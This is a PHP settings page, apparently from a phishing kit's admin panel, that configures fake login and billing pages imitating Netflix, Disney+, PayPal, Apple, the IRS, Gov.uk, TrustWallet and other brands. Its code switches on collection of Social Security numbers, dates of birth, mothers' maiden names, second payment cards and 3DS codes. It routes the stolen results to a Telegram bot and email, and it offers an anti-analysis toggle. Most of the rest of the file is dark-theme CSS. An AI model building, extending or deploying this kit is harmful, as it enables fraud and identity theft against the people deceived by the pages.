<?php
/**
 * GlobalSetting - Settings Configuration
 * Premium UI Style - Matching 405 Dashboard Modal
 */

// Prevent caching
header("Cache-Control: no-cache, no-store, must-revalidate");
header("Pragma: no-cache");
header("Expires: 0");

// Suppress errors
error_reporting(E_ALL);
ini_set('display_errors', 1);

// Cookie-based authentication check
$cookieName = 'gs_auth_token';
function setVerifyAuth() {
    $secret = 'GlobalSetting2024SecretKey';
    $token = $_COOKIE['gs_auth_token'] ?? '';
    $username = $_COOKIE['gs_username'] ?? '';
    return $token === hash('sha256', $username . $secret . date('Y-m-d'));
}

if (!isset($_COOKIE[$cookieName]) || !setVerifyAuth()) {
    header('Location: index.php');
    exit;
}

// ==========================================
// LOAD CONFIG BEFORE ANY OUTPUT
// ==========================================
$configPath = dirname(__DIR__) . '/config/gen.json';
$genConfig = file_exists($configPath) ? json_decode(file_get_contents($configPath), true) : [];

$accessPath = dirname(__DIR__) . '/config/access.json';
$accessConfig = file_exists($accessPath) ? json_decode(file_get_contents($accessPath), true) : [];

$themePath = dirname(__DIR__) . '/config/theme.json';

// Force reload theme.json setiap kali halaman dibuka (no cache)
clearstatcache(true, $themePath);

// Baca theme.json FRESH (tanpa cache)
$themeContent = @file_get_contents($themePath);
$themeConfig = $themeContent ? json_decode($themeContent, true) : [];

// Ambil template aktif dari theme.json
$activeTemplate = strtolower(trim($themeConfig['template_select'] ?? 'netflix'));

// Template mapping
$templates = [
    'netflix' => ['name' => 'Netflix', 'folder' => 'secure-3'],
    'disney' => ['name' => 'Disney+', 'folder' => 'irjBhq6Esw'],
    'xfinity' => ['name' => 'Xfinity', 'folder' => 'hzvQTruKBa'],
    'spectrum' => ['name' => 'Spectrum', 'folder' => 'sspectrum'],
    'paypal' => ['name' => 'PayPal', 'folder' => 'U1IimACP7W'],
    'breezeline' => ['name' => 'Breezeline', 'folder' => 'KsR7xiySIj'],
    'govuk' => ['name' => 'DVLA/Govuk', 'folder' => 'MaIMTt67dp'],
    'apple' => ['name' => 'Apple', 'folder' => 'zMEDH3rzcM'],
    'att' => ['name' => 'AT&T', 'folder' => 'DXNEbwZqcG'],
    'trustwallet' => ['name' => 'TrustWallet', 'folder' => 'cmrU0tg7dN'],
    'irs' => ['name' => 'IRS', 'folder' => 'secure-2'],
    'etmin' => ['name' => 'Etmin', 'folder' => 'etmin'],
];

$activeTemplateName = $templates[$activeTemplate]['name'] ?? ucfirst($activeTemplate);
$activeFolder = $templates[$activeTemplate]['folder'] ?? $activeTemplate;

// Load template-specific control.json
$controlPath = dirname(__DIR__) . '/' . $activeFolder . '/setup/control.json';
if ($activeFolder === 'etmin') {
    $controlPath = dirname(__DIR__) . '/etmin/helper/config.json';
}
$controlConfig = file_exists($controlPath) ? json_decode(file_get_contents($controlPath), true) : [];

// ==========================================
// HANDLE SAVE SETTINGS (BEFORE ANY OUTPUT!)
// ==========================================
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['save_settings'])) {
    // IPWHOIS - ALWAYS ON
    $genConfig['ipwhois_status'] = '1';
    
    // URL Parameter Settings - save to access.json
    $accessConfig['parameter'] = trim($_POST['parameter'] ?? $accessConfig['parameter'] ?? 'good');
    $accessConfig['parameter_status'] = $_POST['parameter_status'] ?? '0';
    
    // Telegram Settings
    $genConfig['telegram'] = $_POST['telegram_status'] ?? 'off';
    $genConfig['telegram_token'] = trim($_POST['telegram_token'] ?? '');
    $genConfig['telegram_chatid'] = trim($_POST['telegram_chatid'] ?? '');
    
    // Email Settings
    $genConfig['email_send_status'] = $_POST['email_status'] ?? 'off';
    $genConfig['email_result'] = trim($_POST['email_result'] ?? '');
    $genConfig['email_from'] = trim($_POST['email_from'] ?? '');
    $genConfig['email_from_name'] = trim($_POST['email_from_name'] ?? '');
    
    // Brand Name (untuk email template: Login, Fullinfo, Billing)
    $genConfig['brand_name'] = trim($_POST['brand_name'] ?? $genConfig['brand_name'] ?? '405 X Gobot.su');
    
    // Language Settings
    $genConfig['auto_detect_lang'] = $_POST['auto_detect_lang'] ?? 'off';
    $genConfig['fallback_lang'] = $_POST['fallback_lang'] ?? 'en';
    $genConfig['supported_countries'] = $_POST['supported_countries'] ?? '';
    
    // Activity Page Settings
    $genConfig['activity_page'] = $_POST['activity_page'] ?? 'on';
    $genConfig['activity_type'] = $_POST['activity_type'] ?? 'locked';
    
    // Form Fields - save to gen.json (used by templates)
    $genConfig['double_card'] = ($_POST['double_card'] ?? 'off') === 'on' ? '1' : '0';
    $genConfig['dob'] = ($_POST['dob'] ?? 'off') === 'on' ? '1' : '0';
    $genConfig['ssn'] = ($_POST['ssn'] ?? 'off') === 'on' ? '1' : '0';
    $genConfig['mmn'] = ($_POST['mmn'] ?? 'off') === 'on' ? '1' : '0';
    $genConfig['city_status'] = ($_POST['city_status'] ?? 'off') === 'on' ? '1' : '0';
    $genConfig['mail_login'] = ($_POST['mail_login'] ?? 'off') === 'on' ? '1' : '0';
    $genConfig['save_card'] = ($_POST['save_card'] ?? 'off') === 'on' ? '1' : '0';
    
    // Card Settings - save to gen.json (used by templates)
    $genConfig['amex_cid'] = ($_POST['amex_cid'] ?? 'off') === 'on' ? '1' : '0';
    $genConfig['valid_ui'] = ($_POST['valid_ui'] ?? 'off') === 'on' ? '1' : '0';
    $genConfig['bin_api'] = ($_POST['bin_api'] ?? 'off') === 'on' ? '1' : '0';
    $genConfig['anti_dev'] = ($_POST['anti_dev'] ?? 'off') === 'on' ? '1' : '0';
    
    // Declined Settings - also save to gen.json
    $genConfig['declined_template'] = $_POST['declined_template'] ?? '1';
    $genConfig['declined_button_style'] = $_POST['declined_button_style'] ?? 'continue';
    $genConfig['billing_declined'] = $_POST['billing_declined'] ?? '1';
    $genConfig['redirect_completed_link'] = trim($_POST['redirect_link'] ?? '');
    
    // Netflix Declined Color Mode (default = original, custom = user colors)
    $genConfig['declined_color_mode'] = $_POST['declined_color_mode'] ?? 'default';
    
    // Netflix Colors (only used when color_mode = custom)
    $genConfig['netflix_color_bg'] = $_POST['netflix_color_bg'] ?? $_POST['netflix_color_bg_text'] ?? '#fff4f4';
    $genConfig['netflix_color_error'] = $_POST['netflix_color_error'] ?? $_POST['netflix_color_error_text'] ?? '#e50914';
    $genConfig['netflix_color_title'] = $_POST['netflix_color_title'] ?? $_POST['netflix_color_title_text'] ?? '#221f1f';
    $genConfig['netflix_color_sub'] = $_POST['netflix_color_sub'] ?? $_POST['netflix_color_sub_text'] ?? '#333333';
    $genConfig['netflix_color_border'] = $_POST['netflix_color_border'] ?? $_POST['netflix_color_border_text'] ?? '#fcd9d9';
    $genConfig['netflix_color_icon_bg'] = $_POST['netflix_color_icon_bg'] ?? $_POST['netflix_color_icon_bg_text'] ?? '#e50914';
    $genConfig['netflix_color_link'] = $_POST['netflix_color_link'] ?? $_POST['netflix_color_link_text'] ?? '#0073e6';
    
    // Netflix 3DS
    $genConfig['netflix_3ds_status'] = $_POST['netflix_3ds_status'] ?? 'off';
    $genConfig['netflix_3ds_template'] = $_POST['netflix_3ds_template'] ?? '1';
    
    // Legacy support
    $genConfig['declined_bg_color'] = $genConfig['netflix_color_bg'];
    $genConfig['declined_text_color'] = $genConfig['netflix_color_error'];

    // Disney+ Specific Settings
    $genConfig['disney_declined_template'] = $_POST['disney_declined_template'] ?? '1';
    $genConfig['disney_3ds_status'] = $_POST['disney_3ds_status'] ?? 'off';
    $genConfig['disney_3ds_template'] = $_POST['disney_3ds_template'] ?? '1';
    $genConfig['disney_error_message'] = $_POST['disney_error_message'] ?? 'couldnt_process';
    $genConfig['disney_color_mode'] = $_POST['disney_color_mode'] ?? 'default';
    
    // Disney+ Colors (only used when color_mode = custom)
    $genConfig['disney_color_bg'] = $_POST['disney_color_bg'] ?? $_POST['disney_color_bg_text'] ?? '#1a1d29';
    $genConfig['disney_color_error'] = $_POST['disney_color_error'] ?? $_POST['disney_color_error_text'] ?? '#f9423a';
    $genConfig['disney_color_title'] = $_POST['disney_color_title'] ?? $_POST['disney_color_title_text'] ?? '#f9f9f9';
    $genConfig['disney_color_sub'] = $_POST['disney_color_sub'] ?? $_POST['disney_color_sub_text'] ?? '#cacaca';
    $genConfig['disney_color_muted'] = $_POST['disney_color_muted'] ?? $_POST['disney_color_muted_text'] ?? '#a0a0a0';
    $genConfig['disney_color_cta'] = $_POST['disney_color_cta'] ?? $_POST['disney_color_cta_text'] ?? '#cacaca';
    $genConfig['disney_color_inner'] = $_POST['disney_color_inner'] ?? $_POST['disney_color_inner_text'] ?? '#0e1524';
    
    // Amazon Prime Specific Settings
    $genConfig['amazon_declined_template'] = $_POST['amazon_declined_template'] ?? '1';
    $genConfig['amazon_3ds_status'] = $_POST['amazon_3ds_status'] ?? 'off';
    $genConfig['amazon_3ds_template'] = $_POST['amazon_3ds_template'] ?? '1';
    $genConfig['amazon_error_message'] = $_POST['amazon_error_message'] ?? 'verification_failed';
    $genConfig['amazon_color_mode'] = $_POST['amazon_color_mode'] ?? 'default';
    
    // ==========================================
    // RENEWAL TEMPLATES SETTINGS
    // ==========================================
    
    // Amazon Prime
    $genConfig['renewal_amazon_enabled'] = $_POST['renewal_amazon_enabled'] ?? 'off';
    $genConfig['renewal_amazon_monthly'] = $_POST['renewal_amazon_monthly'] ?? '14.99';
    $genConfig['renewal_amazon_yearly'] = $_POST['renewal_amazon_yearly'] ?? '139.00';
    $genConfig['renewal_success_title'] = $_POST['renewal_success_title'] ?? 'Verification Successful!';
    $genConfig['renewal_success_text'] = $_POST['renewal_success_text'] ?? 'Your identity has been verified. Please select your Prime membership plan to continue.';
    $genConfig['renewal_page_title'] = $_POST['renewal_page_title'] ?? 'Choose Your Plan';
    $genConfig['renewal_page_subtitle'] = $_POST['renewal_page_subtitle'] ?? 'Select a membership that works for you';
    
    // Netflix
    $genConfig['renewal_netflix_enabled'] = $_POST['renewal_netflix_enabled'] ?? 'off';
    $genConfig['renewal_netflix_standard'] = $_POST['renewal_netflix_standard'] ?? '15.49';
    $genConfig['renewal_netflix_premium'] = $_POST['renewal_netflix_premium'] ?? '22.99';
    
    // Disney+
    $genConfig['renewal_disney_enabled'] = $_POST['renewal_disney_enabled'] ?? 'off';
    $genConfig['renewal_disney_promo'] = $_POST['renewal_disney_promo'] ?? 'on';
    $genConfig['renewal_disney_promo_text'] = $_POST['renewal_disney_promo_text'] ?? 'LIMITED TIME OFFER - SAVE 16%';
    // Disney+ Standalone
    $genConfig['renewal_disney_basic_yearly'] = $_POST['renewal_disney_basic_yearly'] ?? '79.99';
    $genConfig['renewal_disney_premium_yearly'] = $_POST['renewal_disney_premium_yearly'] ?? '139.99';
    // Disney Bundle
    $genConfig['renewal_disney_duo_yearly'] = $_POST['renewal_disney_duo_yearly'] ?? '99.99';
    $genConfig['renewal_disney_trio_basic_yearly'] = $_POST['renewal_disney_trio_basic_yearly'] ?? '149.99';
    $genConfig['renewal_disney_trio_premium_yearly'] = $_POST['renewal_disney_trio_premium_yearly'] ?? '249.99';
    
    // Save gen.json (single source of truth)
    file_put_contents($configPath, json_encode($genConfig, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES));
    
    // Save access.json (parameter settings)
    file_put_contents($accessPath, json_encode($accessConfig, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES));
    
    // Auto-sync to all template control.json files
    $templateFolders = [
        'secure-3', 'hzvQTruKBa', 'irjBhq6Esw', 'U1IimACP7W', 
        'zMEDH3rzcM', 'DXNEbwZqcG', 'sspectrum', 'KsR7xiySIj',
        'secure-2', 'MaIMTt67dp', 'cmrU0tg7dN'
    ];
    
    // Convert "0"/"1" to "on"/"off" for etmin compatibility
    $dobOnOff = ($genConfig['dob'] ?? '0') === '1' ? 'on' : 'off';
    $ssnOnOff = ($genConfig['ssn'] ?? '0') === '1' ? 'on' : 'off';
    $mmnOnOff = ($genConfig['mmn'] ?? '0') === '1' ? 'on' : 'off';
    $doubleCardOnOff = ($genConfig['double_card'] ?? '0') === '1' ? 'on' : 'off';
    
    $syncSettings = [
        'double_card' => $doubleCardOnOff,
        'dob' => $dobOnOff,
        'dob_enabled' => $genConfig['dob'],
        'ssn' => $ssnOnOff,
        'ssn_enabled' => $genConfig['ssn'],
        'mmn' => $mmnOnOff,
        'mmn_enabled' => $genConfig['mmn'],
        'mail_login' => $genConfig['mail_login'],
        'save_card' => $genConfig['save_card'],
        'amex_cid' => $genConfig['amex_cid'],
        'valid_ui' => $genConfig['valid_ui'],
        'bin_api' => $genConfig['bin_api'],
        'anti_dev' => $genConfig['anti_dev'],
        'declined_template' => $genConfig['declined_template'],
        'declined_button_style' => $genConfig['declined_button_style'] ?? 'continue',
        'netflix_3ds_status' => $genConfig['netflix_3ds_status'] ?? 'off',
        'netflix_3ds_template' => $genConfig['netflix_3ds_template'] ?? '1',
        'billing_declined' => $genConfig['billing_declined'],
        'redirect_completed_link' => $genConfig['redirect_completed_link'],
        // Netflix Colors
        'declined_color_mode' => $genConfig['declined_color_mode'] ?? 'default',
        'netflix_color_bg' => $genConfig['netflix_color_bg'] ?? '#fff4f4',
        'netflix_color_error' => $genConfig['netflix_color_error'] ?? '#e50914',
        'netflix_color_title' => $genConfig['netflix_color_title'] ?? '#221f1f',
        'netflix_color_sub' => $genConfig['netflix_color_sub'] ?? '#333333',
        'netflix_color_border' => $genConfig['netflix_color_border'] ?? '#fcd9d9',
        'netflix_color_icon_bg' => $genConfig['netflix_color_icon_bg'] ?? '#e50914',
        'netflix_color_link' => $genConfig['netflix_color_link'] ?? '#0073e6',
        // Disney+ Templates
        'disney_declined_template' => $genConfig['disney_declined_template'] ?? '1',
        'disney_3ds_status' => $genConfig['disney_3ds_status'] ?? 'off',
        'disney_3ds_template' => $genConfig['disney_3ds_template'] ?? '1',
        'disney_error_message' => $genConfig['disney_error_message'] ?? 'couldnt_process',
        'disney_color_mode' => $genConfig['disney_color_mode'] ?? 'default',
        'disney_color_bg' => $genConfig['disney_color_bg'] ?? '#1a1d29',
        'disney_color_error' => $genConfig['disney_color_error'] ?? '#f9423a',
        'disney_color_title' => $genConfig['disney_color_title'] ?? '#f9f9f9',
        'disney_color_sub' => $genConfig['disney_color_sub'] ?? '#cacaca',
        'disney_color_muted' => $genConfig['disney_color_muted'] ?? '#a0a0a0',
        'disney_color_cta' => $genConfig['disney_color_cta'] ?? '#cacaca',
        'disney_color_inner' => $genConfig['disney_color_inner'] ?? '#0e1524'
    ];
    
    foreach ($templateFolders as $folder) {
        $controlPath = dirname(__DIR__) . '/' . $folder . '/setup/control.json';
        if (file_exists($controlPath)) {
            $controlData = json_decode(file_get_contents($controlPath), true) ?? [];
            $controlData = array_merge($controlData, $syncSettings);
            file_put_contents($controlPath, json_encode($controlData, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES));
        }
    }
    
    // Etmin uses "on"/"off" format instead of "0"/"1"
    $cityOnOff = ($genConfig['city_status'] ?? '0') === '1' ? 'on' : 'off';
    
    $etminSyncSettings = [
        'double_card' => $doubleCardOnOff,
        'dob' => $dobOnOff,
        'ssn' => $ssnOnOff,
        'mmn' => $mmnOnOff,
        'city_status' => $cityOnOff,
        'mail_login' => ($genConfig['mail_login'] ?? '0') === '1' ? 'on' : 'off',
        'save_card' => ($genConfig['save_card'] ?? '0') === '1' ? 'on' : 'off',
        'amex_cid' => ($genConfig['amex_cid'] ?? '0') === '1' ? 'on' : 'off',
        'valid_ui' => ($genConfig['valid_ui'] ?? '0') === '1' ? 'on' : 'off',
        'bin_api' => ($genConfig['bin_api'] ?? '0') === '1' ? 'on' : 'off',
        'anti_dev' => ($genConfig['anti_dev'] ?? '0') === '1' ? 'on' : 'off',
        'billing_declined' => ($genConfig['billing_declined'] ?? '0') === '1' ? 'on' : 'off',
        'declined_template' => $genConfig['declined_template'] ?? '1',
        'declined_button_style' => $genConfig['declined_button_style'] ?? 'continue',
        'amazon_declined_template' => $genConfig['amazon_declined_template'] ?? '1',
        'amazon_3ds_status' => $genConfig['amazon_3ds_status'] ?? 'off',
        'amazon_3ds_template' => $genConfig['amazon_3ds_template'] ?? '1',
        'amazon_error_message' => $genConfig['amazon_error_message'] ?? 'verification_failed',
        'amazon_color_mode' => $genConfig['amazon_color_mode'] ?? 'default',
        'redirect_completed_link' => $genConfig['redirect_completed_link'] ?? '',
        'email_result' => $genConfig['email_result'] ?? '',
        'activity_status' => $genConfig['activity_page'] ?? 'off',
        'activity_page_status' => $genConfig['activity_page'] ?? 'off',
        // Renewal page settings - sync from settings.php
        'renewal_page_status' => $genConfig['renewal_amazon_enabled'] ?? 'off',
        'renewal_monthly_price' => $genConfig['renewal_amazon_monthly'] ?? '14.99',
        'renewal_yearly_price' => $genConfig['renewal_amazon_yearly'] ?? '139.00',
    ];
    
    // Sync ke etmin/helper/config.json (etmin punya struktur berbeda - uses on/off)
    $etminConfigPath = dirname(__DIR__) . '/etmin/helper/config.json';
    if (file_exists($etminConfigPath)) {
        $etminData = json_decode(file_get_contents($etminConfigPath), true) ?? [];
        $etminData = array_merge($etminData, $etminSyncSettings);
        file_put_contents($etminConfigPath, json_encode($etminData, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES));
    }
    
    // Sync ke MaIMTt67dp/etmin/helper/config.json juga
    $etminGovukPath = dirname(__DIR__) . '/MaIMTt67dp/etmin/helper/config.json';
    if (file_exists($etminGovukPath)) {
        $etminGovukData = json_decode(file_get_contents($etminGovukPath), true) ?? [];
        $etminGovukData = array_merge($etminGovukData, $etminSyncSettings);
        file_put_contents($etminGovukPath, json_encode($etminGovukData, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES));
    }
    
    header('Location: settings.php?success=Settings saved & synced to all templates!');
    exit;
}

// Test handlers (these don't redirect, so can be after)
$testResult = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['test_telegram'])) {
    $token = $genConfig['telegram_token'] ?? '';
    $chatId = $genConfig['telegram_chatid'] ?? '';
    if (!empty($token) && !empty($chatId)) {
        $url = "https://api.telegram.org/bot{$token}/sendMessage";
        $ch = curl_init();
        curl_setopt_array($ch, [CURLOPT_URL => $url, CURLOPT_POST => true, CURLOPT_POSTFIELDS => ['chat_id' => $chatId, 'text' => "🔧 Test dari GlobalSetting\n✅ Connected!\n📅 " . date('Y-m-d H:i:s')], CURLOPT_RETURNTRANSFER => true, CURLOPT_SSL_VERIFYPEER => false]);
        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        $testResult = $httpCode === 200 ? 'telegram_success' : 'telegram_error';
    }
}

// ==========================================
// NOW INCLUDE HEADER (OUTPUT STARTS HERE)
// ==========================================
require_once 'include/header.php';

$success = $_GET['success'] ?? '';
$error = $_GET['error'] ?? '';
?>

<?php include 'include/sidebar.php'; ?>

<style>
@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700;900&family=JetBrains+Mono:wght@400;500&display=swap');

:root {
    --bg-dark: #0a0e17;
    --bg-card: #111827;
    --bg-card-hover: #1a2235;
    --bg-input: #0d1321;
    --border: #1e2d4a;
    --border-hover: #00f0ff;
    --text: #e2e8f0;
    --text-dim: #8892a4;
    --text-muted: #4a5568;
    
    /* Neon accent */
    --accent-green: #00ff9d;
    --accent-cyan: #00f0ff;
    --accent-purple: #bf5af2;
    --accent-pink: #ff2d78;
    --accent-orange: #ff9f1c;
    --accent-red: #ff3b5c;
    --accent-yellow: #f7e018;
    --accent-blue: #4d7cff;
    
    /* Shadows - Neon glow */
    --glow-green: 0 0 12px rgba(0, 255, 157, 0.25);
    --glow-cyan: 0 0 12px rgba(0, 240, 255, 0.25);
    --glow-purple: 0 0 12px rgba(191, 90, 242, 0.25);
}

* { box-sizing: border-box; }

body {
    background: #0a0e17;
    font-family: 'Roboto', -apple-system, BlinkMacSystemFont, sans-serif;
    color: var(--text);
    min-height: 100vh;
    position: relative;
}

body::before {
    content: '';
    position: fixed;
    top: 0; left: 0;
    width: 100%; height: 100%;
    background: #0a0e17;
    z-index: -2;
}

body::after {
    content: '';
    position: fixed;
    top: 0; left: 0;
    width: 100%; height: 100%;
    background: 
        repeating-linear-gradient(0deg, transparent, transparent 60px, rgba(0, 240, 255, 0.03) 60px, rgba(0, 240, 255, 0.03) 61px),
        repeating-linear-gradient(90deg, transparent, transparent 60px, rgba(0, 240, 255, 0.03) 60px, rgba(0, 240, 255, 0.03) 61px);
    z-index: -1;
    pointer-events: none;
}

@keyframes pulseGlow {
    0%, 100% { opacity: 0.5; }
    50% { opacity: 1; }
}

@keyframes scanLine {
    0% { top: -2px; }
    100% { top: 100%; }
}

@keyframes gradientSlide {
    0% { opacity: 0.7; }
    50% { opacity: 1; }
    100% { opacity: 0.7; }
}

.settings-container {
    max-width: 1200px;
    margin: 0 auto;
    padding: 30px;
}

/* Page Header */
.page-header {
    background: #111827;
    border: 1px solid #1e2d4a;
    border-radius: 12px;
    padding: 24px 28px;
    margin-bottom: 24px;
    position: relative;
    overflow: hidden;
    box-shadow: 0 0 15px rgba(0, 240, 255, 0.05);
}

.page-header::before {
    content: '';
    position: absolute;
    top: 0; left: 0; right: 0;
    height: 3px;
    background: #00f0ff;
}

.page-header h1 {
    font-size: 1.5rem;
    font-weight: 700;
    color: #e2e8f0;
    margin: 0;
    display: flex;
    align-items: center;
    gap: 12px;
}

.page-header h1 i { 
    color: #00f0ff;
}

/* Alert */
.alert-msg {
    padding: 16px 20px;
    border-radius: 12px;
    margin-bottom: 25px;
    display: flex;
    align-items: center;
    gap: 12px;
    font-size: 0.95rem;
    font-weight: 500;
    backdrop-filter: blur(5px);
}

.alert-msg.success {
    background: rgba(0, 255, 157, 0.08);
    border: 1px solid rgba(0, 255, 157, 0.3);
    color: var(--accent-green);
    box-shadow: var(--glow-green);
}

/* Current Template */
.template-bar {
    background: #111827;
    border: 1px solid #1e2d4a;
    border-left: 3px solid #00f0ff;
    border-radius: 12px;
    padding: 20px 24px;
    margin-bottom: 24px;
    display: flex;
    justify-content: space-between;
    align-items: center;
    position: relative;
    box-shadow: 0 0 15px rgba(0, 240, 255, 0.05);
    transition: box-shadow 0.2s;
}

.template-bar:hover {
    box-shadow: 0 0 20px rgba(0, 240, 255, 0.1);
}

.template-bar .label {
    font-size: 0.65rem;
    color: #00f0ff;
    font-weight: 600;
    text-transform: uppercase;
    letter-spacing: 2px;
    margin-bottom: 4px;
}

.template-bar .name {
    font-size: 1.3rem;
    font-weight: 700;
    color: #e2e8f0;
}

.template-bar .folder {
    font-size: 0.72rem;
    color: #8892a4;
    font-family: 'JetBrains Mono', monospace;
    background: #0d1321;
    padding: 5px 12px;
    border-radius: 6px;
}

/* Settings Card */
.settings-card {
    background: #111827;
    border: 1px solid #1e2d4a;
    border-radius: 12px;
    margin-bottom: 20px;
    overflow: hidden;
    transition: border-color 0.2s, box-shadow 0.2s;
    position: relative;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
}

.settings-card:hover {
    border-color: #2a3f6a;
    box-shadow: 0 0 20px rgba(0, 240, 255, 0.08);
}

.settings-card-header {
    padding: 16px 22px;
    border-bottom: 1px solid #1e2d4a;
    display: flex;
    align-items: center;
    gap: 12px;
    flex-wrap: wrap;
    position: relative;
    background: #0d1321;
}

.settings-card-header::before {
    content: '';
    position: absolute;
    left: 0; top: 8px; bottom: 8px;
    width: 3px;
    border-radius: 2px;
}

.settings-card-header .icon { 
    font-size: 1.15rem;
    opacity: 0.85;
}

.settings-card-header .title {
    font-size: 0.8rem;
    font-weight: 600;
    text-transform: uppercase;
    letter-spacing: 1.2px;
}

.settings-card-header .badge {
    font-size: 0.6rem;
    padding: 3px 10px;
    border-radius: 4px;
    font-family: 'JetBrains Mono', monospace;
    font-weight: 500;
    border: 1px solid transparent;
    letter-spacing: 0.3px;
}

.settings-card-header .template-name {
    font-size: 0.68rem;
    color: var(--text-muted);
    padding: 3px 10px;
    border-radius: 4px;
    background: rgba(255, 255, 255, 0.05);
}

.settings-card-body { 
    padding: 22px;
}

/* Section accent colors - Neon Dark */
.settings-card.gobot .settings-card-header::before { background: #00ff9d; }
.settings-card.gobot .icon, .settings-card.gobot .title { color: #00ff9d; }
.settings-card.gobot .badge { background: rgba(0, 255, 157, 0.1); color: #00ff9d; border-color: rgba(0, 255, 157, 0.3); }

.settings-card.form .settings-card-header::before { background: #ff9f1c; }
.settings-card.form .icon, .settings-card.form .title { color: #ff9f1c; }
.settings-card.form .badge { background: rgba(255, 159, 28, 0.1); color: #ff9f1c; border-color: rgba(255, 159, 28, 0.3); }

.settings-card.card-set .settings-card-header::before { background: #00f0ff; }
.settings-card.card-set .icon, .settings-card.card-set .title { color: #00f0ff; }
.settings-card.card-set .badge { background: rgba(0, 240, 255, 0.1); color: #00f0ff; border-color: rgba(0, 240, 255, 0.3); }

.settings-card.declined .settings-card-header::before { background: #ff3b5c; }
.settings-card.declined .icon, .settings-card.declined .title { color: #ff3b5c; }
.settings-card.declined .badge { background: rgba(255, 59, 92, 0.1); color: #ff3b5c; border-color: rgba(255, 59, 92, 0.3); }

.settings-card.language .settings-card-header::before { background: #00ff9d; }
.settings-card.language .icon, .settings-card.language .title { color: #00ff9d; }
.settings-card.language .badge { background: rgba(0, 255, 157, 0.1); color: #00ff9d; border-color: rgba(0, 255, 157, 0.3); }

.settings-card.telegram .settings-card-header::before { background: #4d7cff; }
.settings-card.telegram .icon, .settings-card.telegram .title { color: #4d7cff; }
.settings-card.telegram .badge { background: rgba(77, 124, 255, 0.1); color: #4d7cff; border-color: rgba(77, 124, 255, 0.3); }

.settings-card.email .settings-card-header::before { background: #bf5af2; }
.settings-card.email .icon, .settings-card.email .title { color: #bf5af2; }
.settings-card.email .badge { background: rgba(191, 90, 242, 0.1); color: #bf5af2; border-color: rgba(191, 90, 242, 0.3); }

/* Form Grid */
.form-row {
    display: grid;
    gap: 20px;
}
.form-row.cols-2 { grid-template-columns: repeat(2, 1fr); }
.form-row.cols-3 { grid-template-columns: repeat(3, 1fr); }
.form-row.cols-4 { grid-template-columns: repeat(4, 1fr); }
.form-row.cols-5 { grid-template-columns: repeat(5, 1fr); }
.form-row.cols-6 { grid-template-columns: repeat(6, 1fr); }

@media (max-width: 992px) {
    .form-row.cols-4, .form-row.cols-5, .form-row.cols-6 { grid-template-columns: repeat(3, 1fr); }
}
@media (max-width: 768px) {
    .form-row.cols-3, .form-row.cols-4, .form-row.cols-5, .form-row.cols-6 { grid-template-columns: repeat(2, 1fr); }
}

/* Form Group */
.form-group { display: flex; flex-direction: column; }

.form-label {
    font-size: 0.75rem;
    font-weight: 600;
    color: #8892a4;
    text-transform: uppercase;
    letter-spacing: 1px;
    margin-bottom: 8px;
}

.form-label.highlight { 
    color: #ff2d78;
}

.form-hint {
    font-size: 0.72rem;
    color: #94a3b8;
    margin-top: 6px;
}
.form-hint.pink { 
    color: #ff2d78; 
}

/* Select & Input */
.form-select, .form-input {
    width: 100%;
    padding: 11px 14px;
    background: #0d1321;
    border: 1px solid #1e2d4a;
    border-radius: 8px;
    color: #e2e8f0;
    font-size: 0.88rem;
    font-family: 'Roboto', sans-serif;
    transition: border-color 0.2s, box-shadow 0.2s;
}

.form-select {
    cursor: pointer;
    appearance: none;
    background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='10' height='10' fill='%2300f0ff' viewBox='0 0 16 16'%3E%3Cpath d='M8 11L3 6h10l-5 5z'/%3E%3C/svg%3E");
    background-repeat: no-repeat;
    background-position: right 12px center;
}

.form-select option {
    background: #111827;
    color: #e2e8f0;
    padding: 8px;
}

.form-select option:checked {
    background: #1a2235;
    color: #00f0ff;
}

.form-input { font-family: 'JetBrains Mono', monospace; font-size: 0.85rem; }

.form-select:hover, .form-input:hover { 
    border-color: #2a3f6a;
}

.form-select:focus, .form-input:focus {
    outline: none;
    border-color: #00f0ff;
    box-shadow: 0 0 0 3px rgba(0, 240, 255, 0.1);
    background: #0a0e17;
}

/* Input glow on parent card hover */
.settings-card.gobot:hover .form-select:focus, 
.settings-card.gobot:hover .form-input:focus { border-color: #00ff9d; box-shadow: 0 0 0 3px rgba(0, 255, 157, 0.15); }

.settings-card.form:hover .form-select:focus, 
.settings-card.form:hover .form-input:focus { border-color: #ff9f1c; box-shadow: 0 0 0 3px rgba(255, 159, 28, 0.15); }

.settings-card.card-set:hover .form-select:focus, 
.settings-card.card-set:hover .form-input:focus { border-color: #00f0ff; box-shadow: 0 0 0 3px rgba(0, 240, 255, 0.15); }

/* Declined Template Preview */
.declined-preview {
    display: grid;
    grid-template-columns: repeat(3, 1fr);
    gap: 15px;
    margin-top: 20px;
}

.template-selector {
    display: flex;
    align-items: flex-start;
    gap: 30px;
    flex-wrap: wrap;
}

.template-selector .select-col {
    min-width: 250px;
}

.template-selector .preview-col {
    flex: 1;
}

.template-previews {
    display: grid;
    grid-template-columns: repeat(3, 1fr);
    gap: 15px;
}

@media (max-width: 992px) {
    .template-previews { grid-template-columns: repeat(2, 1fr); }
}

.template-preview {
    background: #0d1321;
    border-radius: 12px;
    padding: 15px;
    border: 3px solid transparent;
    transition: all 0.3s;
    opacity: 0.8;
    transform: scale(0.95);
}

.template-preview:hover {
    border-color: var(--accent-purple);
    transform: scale(1);
    opacity: 1;
}

.template-preview.recommended {
    border-color: var(--accent-yellow);
    box-shadow: 0 0 25px rgba(255, 215, 0, 0.3);
    transform: scale(1);
    opacity: 1;
}

.template-preview .preview-title {
    font-size: 0.75rem;
    font-weight: 700;
    color: #8892a4;
    margin-bottom: 10px;
    display: flex;
    align-items: center;
    gap: 6px;
    text-transform: uppercase;
}

.template-preview .preview-box {
    background: #111827;
    border-radius: 8px;
    padding: 12px;
    text-align: center;
}

.template-preview .preview-icon {
    margin-bottom: 8px;
}

